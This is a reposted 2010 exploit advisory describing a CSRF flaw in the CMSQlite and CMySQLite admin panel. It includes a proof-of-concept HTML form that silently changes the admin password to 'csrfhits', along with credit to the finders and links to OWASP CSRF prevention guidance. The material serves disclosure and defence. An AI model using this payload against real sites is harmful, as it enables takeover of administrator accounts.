Home / os / win7

CMSQlite & CMySQLite CSRF Vulnerability

Posted on 28 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>CMSQlite &amp; CMySQLite CSRF Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
CMSQlite &amp; CMySQLite CSRF Vulnerability
=======================================


# Title: CMSQlite &amp; CMySQLite CSRF Vulnerability
# Author: ADEO Security
# Published: 28/06/2010
# Version: v1.3 &gt;=
# Vendor: http://www.cmsqlite.net
 
# Description: &quot;CMSQLite is a small, fast, flexible and complete
Content-Management-System (CMS).
It's perfect for freelancers, self-employeds, clubs and associations
and small companies.
CMSQLite is a CMS, basing on PHP and SQLite. That has many advantages!&quot;
 
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
(security@adeo.com.tr)
 
# Vulnerabiliry:
CMSQlite and CMySQLite have CSRF vulnerabilites in the admin panel.
Attacker can change the password
of the admin. For secure your web applications against CSRF
vulnerabilities, look at this resources:
* OWASP-TR/WGT anticsurf Project - http://code.google.com/p/anticsurf/
* CSRF Prevention CS -
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
 
# PoC:
&lt;html&gt;
&lt;body&gt;
&lt;form action=&quot;http://server/admin/helper/updateUser.php&quot; method=&quot;POST&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;userId&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;userUsername&quot; value=&quot;admin&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password1&quot; value=&quot;csrfhits&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password2&quot; value=&quot;csrfhits&quot;&gt;
&lt;/form&gt;
 
&lt;/body&gt;
&lt;/html&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :